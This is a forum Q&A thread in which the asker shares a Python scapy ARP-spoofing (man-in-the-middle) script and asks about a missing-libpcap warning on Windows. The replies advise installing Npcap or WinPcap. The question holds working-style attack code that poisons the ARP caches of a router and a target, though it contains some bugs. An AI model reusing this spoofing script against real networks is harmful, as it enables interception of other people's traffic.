# Python scapy - Error :No libpcap provider available

Tags: python, error-handling, scapy

I am using scapy for a simple MITM attack script (I am using it for educational perposes only of course), and I got this strange error which says : **WARNING: No libpcap provider available ! pcap won't be used**. I tryied looking this error up online but no one realy answered it. What does this error mean? Is it possible that I am just not using the script correctly? Any help vould be appreciated.

Here is my script:

```
import scapy.all as scapy 


def get_target_mac(ip):
    arp_request = scapy.ARP(pdst=ip) 
    broadcast = scapy.Ether(dst= 'ff:ff:ff:ff:ff:ff')
    finalpacket = broadcast/arp_request
    answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0]
    mac = answer[0][1].hwsrc   
    return(mac)  

def restore(destination_ip, source_ip):
    target_mac = get_target_mac(destination_ip)
    source_mac = get_target_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=target_mac, pscr=source_ip, hwsrc = source_mac)
    scapy.sendp(packet, verbose=False)

def spoof_arp(target_ip, spoofed_ip):
    mac = get_target_mac(target_ip)
    packet = scapy.ARP(op = 2, hwdst = target_ip, psrc=spoofed_ip)
    scapy.sendp(packet, verbose=False)

def main():
    try:
        while True:
            spoof_arp('router_ip', 'fake_ip')#I hided the real ip
            spoof_arp('fake_ip', 'router_ip')

    except KeyboardInterrupt:
        restore('router_ip', 'fake_ip')
        restore('fake_ip', 'router_ip')
        exit(0)
```

Comment: On what version of what operating system are you running Scapy?

Comment: I am using Windows 10

Comment: Have you installed either WinPcap (https://www.winpcap.org) or Npcap (https://npcap.org)?

Answer (score 2):

I think that **user16139739** give a possible solution. I got some problems with scapy, this being one of them, the stable has some know bugs which were corrected in the [development version](https://scapy.readthedocs.io/en/latest/installation.html#current-development-version).

I did not install anything else, in my case perhaps I already used **user16139739** solution before, but still get this error in some point and another with *RawPcapReader*, so I used the development version.

Answer (score 2):

libpcap is a library for Unix, you need an alternate (npcap) or windows compatible counterpart (WinPcap)

I was able to remedy the problem by installing [Nmap](https://nmap.org/npcap/) (Network Packet Manipulation Library for windows 10).

Comment: Both Npcap and WinPcap are Windows versions of libpcap.  Nmap uses libpcap, which means it needs WinPcap or Npcap on Windows.  WinPcap was a bit behind the times, so the Nmap people worked on Npcap; presumably its installer also includes Npcap, which is why installing Nmap solved the problem - although your link is to the Npcap home page, not the Mmap home page, so maybe you just directly installed Npcap.